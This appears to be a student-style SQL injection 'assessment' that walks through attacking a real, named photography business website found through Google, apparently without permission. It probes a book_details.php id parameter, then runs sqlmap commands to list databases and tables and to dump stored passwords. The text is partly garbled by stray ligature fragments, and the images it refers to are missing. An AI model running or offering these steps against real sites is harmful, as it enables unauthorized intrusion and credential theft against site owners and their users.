SQL INJECTION VUNERABILITY

ASSESSEMENT
BY RAJA SHEKAR REDDY

STEP 1 :
Find the vulnerable website from the Google(Internet).

-https://www.hullihenmoorephotography.com This is my vulnerable website.

STEP 2:
Try to make a tunnel/communication with the website. By changing the value of Id we can
establish

book_details.php?id=601

book_details.php?id=602 , Id changed to 602 still it is working, so tunnel is created

STEP : 3
Use symbol ‘ after Id To check whether the website is re ecting our command in the server or it.

-If it is vulnerable then it re ects same as in above picture.

STEP 4:
Then run the command in the terminal

Sqlmap —url https://hullihenmoorephotography.com/book_details.php?id=601 —dbs

STEP 5:
Wait until it loads, in between it ask for Yes/No con rmation. Just con rm Yes by pressing Y.

The above command show results for available databases for the website.

-The available Databases are:

# hmphoto

# information schema

fl
fi
fl
fi
STEP 6:
Run the command

Sqlmap -h
Which gives available options in sqlmap

STEP 7:
Now I am going fetch all the tables in the database

Run the command

Sqlmap —url https://hullihenmoorephotography.com/book_details.php?id=601 —dbs —tables.

STEP 8:
The above command fetches all the tables in the database.

STEP 9:
Now I am going to nd the passwords in the database.

Run the command Sqlmap —url https://hullihenmoorephotography.com/book_details.php?id=601

—dbs —passwords

The above command results the passwords stored in the database.

fi
 Proof of con rmation:

The le mentioned in the above image.

fi
fi